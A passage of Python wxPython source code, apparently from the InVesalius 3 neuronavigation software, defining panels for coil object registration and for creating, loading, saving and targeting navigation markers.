# if object registration was correctly performed continue with navigation
# obj_reg[0] is object 3x3 fiducial matrix and obj_reg[1] is 3x3 orientation matrix
obj_fiducials, obj_orients, obj_ref_mode, obj_name = self.obj_reg
coreg_data = [m_change, obj_ref_mode]
if self.ref_mode_id:
coord_raw = dco.GetCoordinates(self.trk_init, self.tracker_id, self.ref_mode_id)
else:
coord_raw = np.array([None])
obj_data = db.object_registration(obj_fiducials, obj_orients, coord_raw, m_change)
coreg_data.extend(obj_data)
queues = [self.coord_queue, self.coord_tracts_queue, self.icp_queue]
jobs_list.append(dcr.CoordinateCorregistrate(self.ref_mode_id, tracker_mode, coreg_data,
self.view_tracts, queues,
self.event, self.sleep_nav))
else:
coreg_data = (m_change, 0)
queues = [self.coord_queue, self.coord_tracts_queue, self.icp_queue]
jobs_list.append(dcr.CoordinateCorregistrateNoObject(self.ref_mode_id, tracker_mode, coreg_data,
self.view_tracts, queues,
self.event, self.sleep_nav))
if not errors:
#TODO: Test the trigger thread
if self.trigger_state:
# self.trigger = trig.Trigger(nav_id)
jobs_list.append(trig.TriggerNew(self.trigger_queue, self.event, self.sleep_nav))
if self.view_tracts:
# initialize Trekker parameters
slic = sl.Slice()
prj_data = prj.Project()
matrix_shape = tuple(prj_data.matrix_shape)
affine = slic.affine.copy()
affine[1, -1] -= matrix_shape[1]
affine_vtk = vtk_utils.numpy_to_vtkMatrix4x4(affine)
Publisher.sendMessage("Update marker offset state", create=True)
self.trk_inp = self.trekker, affine, self.seed_offset, self.n_tracts, self.seed_radius,\
self.n_threads, self.act_data, affine_vtk, matrix_shape[1]
# print("Appending the tract computation thread!")
queues = [self.coord_tracts_queue, self.tracts_queue]
if self.enable_act:
jobs_list.append(dti.ComputeTractsACTThread(self.trk_inp, queues, self.event, self.sleep_nav))
else:
jobs_list.append(dti.ComputeTractsThread(self.trk_inp, queues, self.event, self.sleep_nav))
jobs_list.append(UpdateNavigationScene(vis_queues, vis_components,
self.event, self.sleep_nav))
for jobs in jobs_list:
# jobs.daemon = True
jobs.start()
# del jobs
if not self.checkicp.GetValue():
if dlg.ICPcorregistration(self.fre):
m_icp = self.OnICP()
self.icp_fre = db.calculate_fre(self.fiducials_raw, self.fiducials, self.ref_mode_id,
m_change, m_icp)
self.ctrl_icp()
def ResetImageFiducials(self):
for m in range(0, 3):
self.btns_coord[m].SetValue(False)
self.fiducials[m, :] = [np.nan, np.nan, np.nan]
for n in range(0, 3):
self.numctrls_coord[m][n].SetValue(0.0)
def ResetTrackerFiducials(self):
for m in range(3, 6):
self.fiducials[m, :] = [np.nan, np.nan, np.nan]
for n in range(0, 3):
self.numctrls_coord[m][n].SetValue(0.0)
self.txtctrl_fre.SetValue('')
self.txtctrl_fre.SetBackgroundColour('WHITE')
def ResetIcp(self):
self.m_icp = None
self.fre = None
self.icp_fre = None
self.icp = False
self.checkicp.Enable(False)
self.checkicp.SetValue(False)
def OnCloseProject(self):
self.ResetTrackerFiducials()
self.ResetImageFiducials()
self.ResetIcp()
self.OnChoiceTracker(False, self.choice_trck)
Publisher.sendMessage('Update object registration')
Publisher.sendMessage('Update track object state', flag=False, obj_name=False)
Publisher.sendMessage('Delete all markers')
Publisher.sendMessage("Update marker offset state", create=False)
Publisher.sendMessage("Remove tracts")
Publisher.sendMessage("Set cross visibility", visibility=0)
# TODO: Reset camera initial focus
Publisher.sendMessage('Reset cam clipping range')
class ObjectRegistrationPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
try:
default_colour = wx.SystemSettings.GetColour(wx.SYS_COLOUR_MENUBAR)
except AttributeError:
default_colour = wx.SystemSettings_GetColour(wx.SYS_COLOUR_MENUBAR)
self.SetBackgroundColour(default_colour)
self.coil_list = const.COIL
self.nav_prop = None
self.obj_fiducials = None
self.obj_orients = None
self.obj_ref_mode = None
self.obj_name = None
self.timestamp = const.TIMESTAMP
self.SetAutoLayout(1)
self.__bind_events()
# Button for creating new coil
tooltip = wx.ToolTip(_("Create new coil"))
btn_new = wx.Button(self, -1, _("New"), size=wx.Size(65, 23))
btn_new.SetToolTip(tooltip)
btn_new.Enable(1)
btn_new.Bind(wx.EVT_BUTTON, self.OnLinkCreate)
self.btn_new = btn_new
# Button for import config coil file
tooltip = wx.ToolTip(_("Load coil configuration file"))
btn_load = wx.Button(self, -1, _("Load"), size=wx.Size(65, 23))
btn_load.SetToolTip(tooltip)
btn_load.Enable(1)
btn_load.Bind(wx.EVT_BUTTON, self.OnLinkLoad)
self.btn_load = btn_load
# Save button for object registration
tooltip = wx.ToolTip(_(u"Save object registration file"))
btn_save = wx.Button(self, -1, _(u"Save"), size=wx.Size(65, 23))
btn_save.SetToolTip(tooltip)
btn_save.Enable(1)
btn_save.Bind(wx.EVT_BUTTON, self.ShowSaveObjectDialog)
self.btn_save = btn_save
# Create a horizontal sizer to represent button save
line_save = wx.BoxSizer(wx.HORIZONTAL)
line_save.Add(btn_new, 1, wx.LEFT | wx.TOP | wx.RIGHT, 4)
line_save.Add(btn_load, 1, wx.LEFT | wx.TOP | wx.RIGHT, 4)
line_save.Add(btn_save, 1, wx.LEFT | wx.TOP | wx.RIGHT, 4)
# Change angles threshold
text_angles = wx.StaticText(self, -1, _("Angle threshold [degrees]:"))
spin_size_angles = wx.SpinCtrl(self, -1, "", size=wx.Size(50, 23))
spin_size_angles.SetRange(1, 99)
spin_size_angles.SetValue(const.COIL_ANGLES_THRESHOLD)
spin_size_angles.Bind(wx.EVT_TEXT, partial(self.OnSelectAngleThreshold, ctrl=spin_size_angles))
spin_size_angles.Bind(wx.EVT_SPINCTRL, partial(self.OnSelectAngleThreshold, ctrl=spin_size_angles))
# Change dist threshold
text_dist = wx.StaticText(self, -1, _("Distance threshold [mm]:"))
spin_size_dist = wx.SpinCtrl(self, -1, "", size=wx.Size(50, 23))
spin_size_dist.SetRange(1, 99)
spin_size_dist.SetValue(const.COIL_ANGLES_THRESHOLD)
spin_size_dist.Bind(wx.EVT_TEXT, partial(self.OnSelectDistThreshold, ctrl=spin_size_dist))
spin_size_dist.Bind(wx.EVT_SPINCTRL, partial(self.OnSelectDistThreshold, ctrl=spin_size_dist))
# Change timestamp interval
text_timestamp = wx.StaticText(self, -1, _("Timestamp interval [s]:"))
spin_timestamp_dist = wx.SpinCtrlDouble(self, -1, "", size=wx.Size(50, 23), inc = 0.1)
spin_timestamp_dist.SetRange(0.5, 60.0)
spin_timestamp_dist.SetValue(self.timestamp)
spin_timestamp_dist.Bind(wx.EVT_TEXT, partial(self.OnSelectTimestamp, ctrl=spin_timestamp_dist))
spin_timestamp_dist.Bind(wx.EVT_SPINCTRL, partial(self.OnSelectTimestamp, ctrl=spin_timestamp_dist))
self.spin_timestamp_dist = spin_timestamp_dist
# Create a horizontal sizer to threshold configs
line_angle_threshold = wx.BoxSizer(wx.HORIZONTAL)
line_angle_threshold.AddMany([(text_angles, 1, wx.EXPAND | wx.GROW | wx.TOP| wx.RIGHT | wx.LEFT, 5),
(spin_size_angles, 0, wx.ALL | wx.EXPAND | wx.GROW, 5)])
line_dist_threshold = wx.BoxSizer(wx.HORIZONTAL)
line_dist_threshold.AddMany([(text_dist, 1, wx.EXPAND | wx.GROW | wx.TOP| wx.RIGHT | wx.LEFT, 5),
(spin_size_dist, 0, wx.ALL | wx.EXPAND | wx.GROW, 5)])
line_timestamp = wx.BoxSizer(wx.HORIZONTAL)
line_timestamp.AddMany([(text_timestamp, 1, wx.EXPAND | wx.GROW | wx.TOP| wx.RIGHT | wx.LEFT, 5),
(spin_timestamp_dist, 0, wx.ALL | wx.EXPAND | wx.GROW, 5)])
# Check box for trigger monitoring to create markers from serial port
checkrecordcoords = wx.CheckBox(self, -1, _('Record coordinates'))
checkrecordcoords.SetValue(False)
checkrecordcoords.Enable(0)
checkrecordcoords.Bind(wx.EVT_CHECKBOX, partial(self.OnRecordCoords, ctrl=checkrecordcoords))
self.checkrecordcoords = checkrecordcoords
# Check box to track object or simply the stylus
checktrack = wx.CheckBox(self, -1, _('Track object'))
checktrack.SetValue(False)
checktrack.Enable(0)
checktrack.Bind(wx.EVT_CHECKBOX, partial(self.OnTrackObject, ctrl=checktrack))
self.checktrack = checktrack
line_checks = wx.BoxSizer(wx.HORIZONTAL)
line_checks.Add(checkrecordcoords, 0, wx.ALIGN_LEFT | wx.RIGHT | wx.LEFT, 5)
line_checks.Add(checktrack, 0, wx.RIGHT | wx.LEFT, 5)
# Add line sizers into main sizer
main_sizer = wx.BoxSizer(wx.VERTICAL)
main_sizer.Add(line_save, 0, wx.LEFT | wx.RIGHT | wx.TOP | wx.ALIGN_CENTER_HORIZONTAL, 5)
main_sizer.Add(line_angle_threshold, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, 5)
main_sizer.Add(line_dist_threshold, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, 5)
main_sizer.Add(line_timestamp, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, 5)
main_sizer.Add(line_checks, 0, wx.GROW | wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP | wx.BOTTOM, 10)
main_sizer.Fit(self)
self.SetSizer(main_sizer)
self.Update()
def __bind_events(self):
Publisher.subscribe(self.UpdateTrackerInit, 'Update tracker initializer')
Publisher.subscribe(self.UpdateNavigationStatus, 'Navigation status')
Publisher.subscribe(self.OnCloseProject, 'Close project data')
Publisher.subscribe(self.OnRemoveObject, 'Remove object data')
def UpdateTrackerInit(self, nav_prop):
self.nav_prop = nav_prop
def UpdateNavigationStatus(self, nav_status, vis_status):
if nav_status:
self.checkrecordcoords.Enable(1)
self.checktrack.Enable(0)
self.btn_save.Enable(0)
self.btn_new.Enable(0)
self.btn_load.Enable(0)
else:
self.OnRecordCoords(nav_status, self.checkrecordcoords)
self.checkrecordcoords.SetValue(False)
self.checkrecordcoords.Enable(0)
self.btn_save.Enable(1)
self.btn_new.Enable(1)
self.btn_load.Enable(1)
if self.obj_fiducials is not None:
self.checktrack.Enable(1)
#Publisher.sendMessage('Enable target button', True)
def OnSelectAngleThreshold(self, evt, ctrl):
Publisher.sendMessage('Update angle threshold', angle=ctrl.GetValue())
def OnSelectDistThreshold(self, evt, ctrl):
Publisher.sendMessage('Update dist threshold', dist_threshold=ctrl.GetValue())
def OnSelectTimestamp(self, evt, ctrl):
self.timestamp = ctrl.GetValue()
def OnRecordCoords(self, evt, ctrl):
if ctrl.GetValue() and evt:
self.spin_timestamp_dist.Enable(0)
self.thr_record = rec.Record(ctrl.GetValue(), self.timestamp)
elif (not ctrl.GetValue() and evt) or (ctrl.GetValue() and not evt) :
self.spin_timestamp_dist.Enable(1)
self.thr_record.stop()
elif not ctrl.GetValue() and not evt:
None
def OnTrackObject(self, evt, ctrl):
Publisher.sendMessage('Update track object state', flag=evt.GetSelection(), obj_name=self.obj_name)
def OnComboCoil(self, evt):
# coil_name = evt.GetString()
coil_index = evt.GetSelection()
Publisher.sendMessage('Change selected coil', self.coil_list[coil_index][1])
def OnLinkCreate(self, event=None):
if self.nav_prop:
dialog = dlg.ObjectCalibrationDialog(self.nav_prop)
try:
if dialog.ShowModal() == wx.ID_OK:
self.obj_fiducials, self.obj_orients, self.obj_ref_mode, self.obj_name, polydata = dialog.GetValue()
if np.isfinite(self.obj_fiducials).all() and np.isfinite(self.obj_orients).all():
self.checktrack.Enable(1)
Publisher.sendMessage('Update object registration',
data=(self.obj_fiducials, self.obj_orients, self.obj_ref_mode, self.obj_name))
Publisher.sendMessage('Update status text in GUI',
label=_("Ready"))
# Enable automatically Track object, Show coil and disable Vol. Camera
self.checktrack.SetValue(True)
Publisher.sendMessage('Update track object state', flag=True, obj_name=self.obj_name, polydata=polydata)
Publisher.sendMessage('Change camera checkbox', status=False)
except wx._core.PyAssertionError: # TODO FIX: win64
pass
else:
dlg.ShowNavigationTrackerWarning(0, 'choose')
def OnLinkLoad(self, event=None):
filename = dlg.ShowLoadSaveDialog(message=_(u"Load object registration"),
wildcard=_("Registration files (*.obr)|*.obr"))
# data_dir = os.environ.get('OneDrive') + r'\data\dti_navigation\baran\anat_reg_improve_20200609'
# coil_path = 'magstim_coil_dell_laptop.obr'
# filename = os.path.join(data_dir, coil_path)
try:
if filename:
#TODO: Improve method to read the file, using "with" similar to OnLoadParameters
data = np.loadtxt(filename, delimiter='\t')
self.obj_fiducials = data[:, :3]
self.obj_orients = data[:, 3:]
text_file = open(filename, "r")
header = text_file.readline().split('\t')
text_file.close()
self.obj_name = header[1]
self.obj_ref_mode = int(header[-1])
self.checktrack.Enable(1)
self.checktrack.SetValue(True)
Publisher.sendMessage('Update object registration',
data=(self.obj_fiducials, self.obj_orients, self.obj_ref_mode, self.obj_name))
Publisher.sendMessage('Update status text in GUI',
label=_("Object file successfully loaded"))
Publisher.sendMessage('Update track object state', flag=True, obj_name=self.obj_name)
Publisher.sendMessage('Change camera checkbox', status=False)
# wx.MessageBox(_("Object file successfully loaded"), _("Load"))
except:
wx.MessageBox(_("Object registration file incompatible."), _("InVesalius 3"))
Publisher.sendMessage('Update status text in GUI', label="")
def ShowSaveObjectDialog(self, evt):
if np.isnan(self.obj_fiducials).any() or np.isnan(self.obj_orients).any():
wx.MessageBox(_("Digitize all object fiducials before saving"), _("Save error"))
else:
filename = dlg.ShowLoadSaveDialog(message=_(u"Save object registration as..."),
wildcard=_("Registration files (*.obr)|*.obr"),
style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT,
default_filename="object_registration.obr", save_ext="obr")
if filename:
hdr = 'Object' + "\t" + utils.decode(self.obj_name, const.FS_ENCODE) + "\t" + 'Reference' + "\t" + str('%d' % self.obj_ref_mode)
data = np.hstack([self.obj_fiducials, self.obj_orients])
np.savetxt(filename, data, fmt='%.4f', delimiter='\t', newline='\n', header=hdr)
wx.MessageBox(_("Object file successfully saved"), _("Save"))
def OnCloseProject(self):
self.OnRemoveObject()
def OnRemoveObject(self):
self.checkrecordcoords.SetValue(False)
self.checkrecordcoords.Enable(0)
self.checktrack.SetValue(False)
self.checktrack.Enable(0)
self.nav_prop = None
self.obj_fiducials = None
self.obj_orients = None
self.obj_ref_mode = None
self.obj_name = None
self.timestamp = const.TIMESTAMP
Publisher.sendMessage('Update track object state', flag=False, obj_name=False)
class MarkersPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
try:
default_colour = wx.SystemSettings.GetColour(wx.SYS_COLOUR_MENUBAR)
except AttributeError:
default_colour = wx.SystemSettings_GetColour(wx.SYS_COLOUR_MENUBAR)
self.SetBackgroundColour(default_colour)
self.SetAutoLayout(1)
self.__bind_events()
self.current_coord = 0, 0, 0, 0, 0, 0
self.current_angle = 0, 0, 0
self.current_seed = 0, 0, 0
self.list_coord = []
self.marker_ind = 0
self.tgt_flag = self.tgt_index = None
self.nav_status = False
self.marker_colour = const.MARKER_COLOUR
self.marker_size = const.MARKER_SIZE
# Change marker size
spin_size = wx.SpinCtrl(self, -1, "", size=wx.Size(40, 23))
spin_size.SetRange(1, 99)
spin_size.SetValue(self.marker_size)
spin_size.Bind(wx.EVT_TEXT, partial(self.OnSelectSize, ctrl=spin_size))
spin_size.Bind(wx.EVT_SPINCTRL, partial(self.OnSelectSize, ctrl=spin_size))
# Marker colour select
select_colour = csel.ColourSelect(self, -1, colour=[255*s for s in self.marker_colour], size=wx.Size(20, 23))
select_colour.Bind(csel.EVT_COLOURSELECT, partial(self.OnSelectColour, ctrl=select_colour))
btn_create = wx.Button(self, -1, label=_('Create marker'), size=wx.Size(135, 23))
btn_create.Bind(wx.EVT_BUTTON, self.OnCreateMarker)
sizer_create = wx.FlexGridSizer(rows=1, cols=3, hgap=5, vgap=5)
sizer_create.AddMany([(spin_size, 1),
(select_colour, 0),
(btn_create, 0)])
# Buttons to save and load markers and to change its visibility as well
btn_save = wx.Button(self, -1, label=_('Save'), size=wx.Size(65, 23))
btn_save.Bind(wx.EVT_BUTTON, self.OnSaveMarkers)
btn_load = wx.Button(self, -1, label=_('Load'), size=wx.Size(65, 23))
btn_load.Bind(wx.EVT_BUTTON, self.OnLoadMarkers)
btn_visibility = wx.ToggleButton(self, -1, _("Hide"), size=wx.Size(65, 23))
btn_visibility.Bind(wx.EVT_TOGGLEBUTTON, partial(self.OnMarkersVisibility, ctrl=btn_visibility))
sizer_btns = wx.FlexGridSizer(rows=1, cols=3, hgap=5, vgap=5)
sizer_btns.AddMany([(btn_save, 1, wx.RIGHT),
(btn_load, 0, wx.LEFT | wx.RIGHT),
(btn_visibility, 0, wx.LEFT)])
# Buttons to delete or remove markers
btn_delete_single = wx.Button(self, -1, label=_('Remove'), size=wx.Size(65, 23))
btn_delete_single.Bind(wx.EVT_BUTTON, self.OnDeleteSingleMarker)
btn_delete_all = wx.Button(self, -1, label=_('Delete all'), size=wx.Size(135, 23))
btn_delete_all.Bind(wx.EVT_BUTTON, self.OnDeleteAllMarkers)
sizer_delete = wx.FlexGridSizer(rows=1, cols=2, hgap=5, vgap=5)
sizer_delete.AddMany([(btn_delete_single, 1, wx.RIGHT),
(btn_delete_all, 0, wx.LEFT)])
# List of markers
self.lc = wx.ListCtrl(self, -1, style=wx.LC_REPORT, size=wx.Size(0,120))
self.lc.InsertColumn(0, '#')
self.lc.InsertColumn(1, 'X')
self.lc.InsertColumn(2, 'Y')
self.lc.InsertColumn(3, 'Z')
self.lc.InsertColumn(4, 'ID')
self.lc.SetColumnWidth(0, 28)
self.lc.SetColumnWidth(1, 50)
self.lc.SetColumnWidth(2, 50)
self.lc.SetColumnWidth(3, 50)
self.lc.SetColumnWidth(4, 60)
self.lc.Bind(wx.EVT_LIST_ITEM_RIGHT_CLICK, self.OnMouseRightDown)
self.lc.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self.OnItemBlink)
self.lc.Bind(wx.EVT_LIST_ITEM_DESELECTED, self.OnStopItemBlink)
# Add all lines into main sizer
group_sizer = wx.BoxSizer(wx.VERTICAL)
group_sizer.Add(sizer_create, 0, wx.TOP | wx.BOTTOM | wx.ALIGN_CENTER_HORIZONTAL, 5)
group_sizer.Add(sizer_btns, 0, wx.BOTTOM | wx.ALIGN_CENTER_HORIZONTAL, 5)
group_sizer.Add(sizer_delete, 0, wx.BOTTOM | wx.ALIGN_CENTER_HORIZONTAL, 5)
group_sizer.Add(self.lc, 0, wx.EXPAND | wx.ALL, 5)
group_sizer.Fit(self)
self.SetSizer(group_sizer)
self.Update()
def __bind_events(self):
# Publisher.subscribe(self.UpdateCurrentCoord, 'Co-registered points')
Publisher.subscribe(self.UpdateCurrentCoord, 'Set cross focal point')
Publisher.subscribe(self.OnDeleteSingleMarker, 'Delete fiducial marker')
Publisher.subscribe(self.OnDeleteAllMarkers, 'Delete all markers')
Publisher.subscribe(self.OnCreateMarker, 'Create marker')
Publisher.subscribe(self.UpdateNavigationStatus, 'Navigation status')
Publisher.subscribe(self.UpdateSeedCoordinates, 'Update tracts')
def UpdateCurrentCoord(self, position):
self.current_coord = position
#self.current_angle = pubsub_evt.data[1][3:]
def UpdateNavigationStatus(self, nav_status, vis_status):
if not nav_status:
sleep(0.5)
#self.current_coord[3:] = 0, 0, 0
self.nav_status = False
else:
self.nav_status = True
def UpdateSeedCoordinates(self, root=None, affine_vtk=None, coord_offset=(0, 0, 0)):
self.current_seed = coord_offset
def OnMouseRightDown(self, evt):
# TODO: Enable the "Set as target" only when target is created with registered object
menu_id = wx.Menu()
edit_id = menu_id.Append(0, _('Edit ID'))
menu_id.Bind(wx.EVT_MENU, self.OnMenuEditMarkerId, edit_id)
color_id = menu_id.Append(2, _('Edit color'))
menu_id.Bind(wx.EVT_MENU, self.OnMenuSetColor, color_id)
menu_id.AppendSeparator()
target_menu = menu_id.Append(1, _('Set as target'))
menu_id.Bind(wx.EVT_MENU, self.OnMenuSetTarget, target_menu)
# TODO: Create the remove target option so the user can disable the target without removing the marker
# target_menu_rem = menu_id.Append(3, _('Remove target'))
# menu_id.Bind(wx.EVT_MENU, self.OnMenuRemoveTarget, target_menu_rem)
target_menu.Enable(True)
self.PopupMenu(menu_id)
menu_id.Destroy()
def OnItemBlink(self, evt):
Publisher.sendMessage('Blink Marker', index=self.lc.GetFocusedItem())
def OnStopItemBlink(self, evt):
Publisher.sendMessage('Stop Blink Marker')
def OnMenuEditMarkerId(self, evt):
list_index = self.lc.GetFocusedItem()
if evt == 'TARGET':
id_label = evt
else:
id_label = dlg.ShowEnterMarkerID(self.lc.GetItemText(list_index, 4))
if id_label == 'TARGET':
id_label = ''
wx.MessageBox(_("Invalid TARGET ID."), _("InVesalius 3"))
self.lc.SetItem(list_index, 4, id_label)
# Add the new ID to exported list
if len(self.list_coord[list_index]) > 8:
self.list_coord[list_index][10] = str(id_label)
else:
self.list_coord[list_index][7] = str(id_label)
def OnMenuSetTarget(self, evt):
if isinstance(evt, int):
self.lc.Focus(evt)
if self.tgt_flag:
self.lc.SetItemBackgroundColour(self.tgt_index, 'white')
Publisher.sendMessage('Set target transparency', status=False, index=self.tgt_index)
self.lc.SetItem(self.tgt_index, 4, '')
# Add the new ID to exported list
if len(self.list_coord[self.tgt_index]) > 8:
self.list_coord[self.tgt_index][10] = str('')
else:
self.list_coord[self.tgt_index][7] = str('')
self.tgt_index = self.lc.GetFocusedItem()
self.lc.SetItemBackgroundColour(self.tgt_index, 'RED')
Publisher.sendMessage('Update target', coord=self.list_coord[self.tgt_index][:6])
Publisher.sendMessage('Set target transparency', status=True, index=self.tgt_index)
Publisher.sendMessage('Disable or enable coil tracker', status=True)
self.OnMenuEditMarkerId('TARGET')
self.tgt_flag = True
wx.MessageBox(_("New target selected."), _("InVesalius 3"))
def OnMenuSetColor(self, evt):
index = self.lc.GetFocusedItem()
color_current = [self.list_coord[index][n] * 255 for n in range(6, 9)]
color_new = dlg.ShowColorDialog(color_current=color_current)
if color_new:
assert len(color_new) == 3
for n, col in enumerate(color_new):
self.list_coord[index][n+6] = col/255.0
Publisher.sendMessage('Set new color', index=index, color=color_new)
def OnDeleteAllMarkers(self, evt=None):
if self.list_coord:
if evt is None:
result = wx.ID_OK
else:
# result = dlg.DeleteAllMarkers()
result = dlg.ShowConfirmationDialog(msg=_("Remove all markers? Cannot be undone."))
if result == wx.ID_OK:
self.list_coord = []
self.marker_ind = 0
Publisher.sendMessage('Remove all markers', indexes=self.lc.GetItemCount())
self.lc.DeleteAllItems()
Publisher.sendMessage('Stop Blink Marker', index='DeleteAll')
if self.tgt_flag:
self.tgt_flag = self.tgt_index = None
Publisher.sendMessage('Disable or enable coil tracker', status=False)
if not hasattr(evt, 'data'):
wx.MessageBox(_("Target deleted."), _("InVesalius 3"))
def OnDeleteSingleMarker(self, evt=None, marker_id=None):
# OnDeleteSingleMarker is used for both pubsub and button click events
# Pubsub is used for fiducial handle and button click for all others
if not evt:
if self.lc.GetItemCount():
for id_n in range(self.lc.GetItemCount()):
item = self.lc.GetItem(id_n, 4)
if item.GetText() == marker_id:
for i in const.BTNS_IMG_MKS:
if marker_id in list(const.BTNS_IMG_MKS[i].values())[0]:
self.lc.Focus(item.GetId())
index = [self.lc.GetFocusedItem()]
else:
if self.lc.GetFirstSelected() is not -1:
index = self.GetSelectedItems()
else:
index = None
#TODO: There are bugs when no marker is selected, test and improve
if index:
if self.tgt_flag and self.tgt_index == index[0]:
self.tgt_flag = self.tgt_index = None
Publisher.sendMessage('Disable or enable coil tracker', status=False)
wx.MessageBox(_("No data selected."), _("InVesalius 3"))
self.DeleteMarker(index)
else:
wx.MessageBox(_("Target deleted."), _("InVesalius 3"))
def DeleteMarker(self, index):
for i in reversed(index):
del self.list_coord[i]
self.lc.DeleteItem(i)
for n in range(0, self.lc.GetItemCount()):
self.lc.SetItem(n, 0, str(n+1))
self.marker_ind -= 1
Publisher.sendMessage('Remove marker', index=index)
def OnCreateMarker(self, evt=None, coord=None, marker_id=None, colour=None):
# OnCreateMarker is used for both pubsub and button click events
# Pubsub is used for markers created with fiducial buttons, trigger and create marker button
if not colour:
colour = self.marker_colour
if not coord:
coord = self.current_coord
if evt is None:
if coord:
self.CreateMarker(coord=coord, colour=(0.0, 1.0, 0.0), size=self.marker_size,
marker_id=marker_id, seed=self.current_seed)
else:
self.CreateMarker(coord=self.current_coord, colour=colour, size=self.marker_size,
seed=self.current_seed)
else:
self.CreateMarker(coord=self.current_coord, colour=colour, size=self.marker_size,
seed=self.current_seed)
def OnLoadMarkers(self, evt):
filename = dlg.ShowLoadSaveDialog(message=_(u"Load markers"),
wildcard=_("Markers files (*.mks)|*.mks"))
# data_dir = os.environ.get('OneDrive') + r'\data\dti_navigation\baran\anat_reg_improve_20200609'
# marker_path = 'markers.mks'
# filename = os.path.join(data_dir, marker_path)
if filename:
try:
count_line = self.lc.GetItemCount()
# content = [s.rstrip() for s in open(filename)]
with open(filename, 'r') as file:
reader = csv.reader(file, delimiter='\t')
content = [row for row in reader]
for line in content:
target = None
# line = [s for s in data.split()]
if len(line) > 8:
coord = [float(s) for s in line[:6]]
colour = [float(s) for s in line[6:9]]
size = float(line[9])
# marker_id = line[10]
if len(line) > 11:
seed = [float(s) for s in line[11:14]]
else:
seed = 0., 0., 0.
# coord = float(line[0]), float(line[1]), float(line[2]), float(line[3]), float(line[4]), float(line[5])
# colour = float(line[6]), float(line[7]), float(line[8])
# size = float(line[9])
if len(line) >= 11:
for i in const.BTNS_IMG_MKS:
if line[10] in list(const.BTNS_IMG_MKS[i].values())[0]:
Publisher.sendMessage('Load image fiducials', marker_id=line[10], coord=coord)
elif line[10] == 'TARGET':
target = count_line
else:
line.append("")
self.CreateMarker(coord, colour, size, line[10], seed)
if target is not None:
self.OnMenuSetTarget(target)
else:
coord = float(line[0]), float(line[1]), float(line[2]), 0, 0, 0
colour = float(line[3]), float(line[4]), float(line[5])
size = float(line[6])
if len(line) == 8:
for i in const.BTNS_IMG_MKS:
if line[7] in list(const.BTNS_IMG_MKS[i].values())[0]:
Publisher.sendMessage('Load image fiducials', marker_id=line[7], coord=coord)
else:
line.append("")
self.CreateMarker(coord, colour, size, line[7])
count_line += 1
except:
wx.MessageBox(_("Invalid markers file."), _("InVesalius 3"))
def OnMarkersVisibility(self, evt, ctrl):
if ctrl.GetValue():
Publisher.sendMessage('Hide all markers', indexes=self.lc.GetItemCount())
ctrl.SetLabel('Show')
else:
Publisher.sendMessage('Show all markers', indexes=self.lc.GetItemCount())
ctrl.SetLabel('Hide')
def OnSaveMarkers(self, evt):
filename = dlg.ShowLoadSaveDialog(message=_(u"Save markers as..."),
wildcard=_("Marker files (*.mks)|*.mks"),
style=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT,
default_filename="markers.mks", save_ext="mks")
if filename:
if self.list_coord:
with open(filename, 'w', newline='') as file:
writer = csv.writer(file, delimiter='\t')
writer.writerows(self.list_coord)
# text_file = open(filename, "w")
# list_slice1 = self.list_coord[0]
# coord = str('%.3f' %self.list_coord[0][0]) + "\t" + str('%.3f' %self.list_coord[0][1]) + "\t" + str('%.3f' %self.list_coord[0][2])
# angles = str('%.3f' %self.list_coord[0][3]) + "\t" + str('%.3f' %self.list_coord[0][4]) + "\t" + str('%.3f' %self.list_coord[0][5])
# properties = str('%.3f' %list_slice1[6]) + "\t" + str('%.3f' %list_slice1[7]) + "\t" + str('%.3f' %list_slice1[8]) + "\t" + str('%.1f' %list_slice1[9]) + "\t" + list_slice1[10]
# line = coord + "\t" + angles + "\t" + properties + "\n"
# list_slice = self.list_coord[1:]
#
# for value in list_slice:
# coord = str('%.3f' %value[0]) + "\t" + str('%.3f' %value[1]) + "\t" + str('%.3f' %value[2])
# angles = str('%.3f' % value[3]) + "\t" + str('%.3f' % value[4]) + "\t" + str('%.3f' % value[5])
# properties = str('%.3f' %value[6]) + "\t" + str('%.3f' %value[7]) + "\t" + str('%.3f' %value[8]) + "\t" + str('%.1f' %value[9]) + "\t" + value[10]
# line = line + coord + "\t" + angles + "\t" +properties + "\n"
#
# text_file.writelines(line)
# text_file.close()
def OnSelectColour(self, evt, ctrl):
self.marker_colour = [colour/255.0 for colour in ctrl.GetValue()]
def OnSelectSize(self, evt, ctrl):
self.marker_size = ctrl.GetValue()
def CreateMarker(self, coord, colour, size, marker_id="x", seed=(0, 0, 0)):
# TODO: Use matrix coordinates and not world coordinates as current method.
# This makes easier for inter-software comprehension.
Publisher.sendMessage('Add marker', ball_id=self.marker_ind, size=size, colour=colour, coord=coord[0:3])
self.marker_ind += 1
# List of lists with coordinates and properties of a marker
line = []
line.extend(coord)
line.extend(colour)
line.append(size)
line.append(marker_id)
line.extend(seed)
# line = [coord[0], coord[1], coord[2], coord[3], coord[4], coord[5], colour[0], colour[1], colour[2], size, marker_id]
# line = [coord[0], coord[1], coord[2], coord[3], coord[4], coord[5],
# colour[0], colour[1], colour[2], size, marker_id,
# seed[0], seed[1], seed[2]]
# Adding current line to a list of all markers already created
if not self.list_coord:
self.list_coord = [line]
else:
self.list_coord.append(line)
# Add item to list control in panel
num_items = self.lc.GetItemCount()
self.lc.InsertItem(num_items, str(num_items + 1))
self.lc.SetItem(num_items, 1, str(round(coord[0], 2)))
self.lc.SetItem(num_items, 2, str(round(coord[1], 2)))
self.lc.SetItem(num_items, 3, str(round(coord[2], 2)))
self.lc.SetItem(num_items, 4, str(marker_id))
self.lc.EnsureVisible(num_items)
def GetSelectedItems(self):
"""
Returns a list of the selected items in the list control.
"""
selection = []
index = self.lc.GetFirstSelected()
selection.append(index)
while len(selection) != self.lc.GetSelectedItemCount():
index = self.lc.GetNextSelected(index)
selection.append(index)
return selection
class DbsPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
try:
default_colour = wx.SystemSettings.GetColour(wx.SYS_COLOUR_MENUBAR)
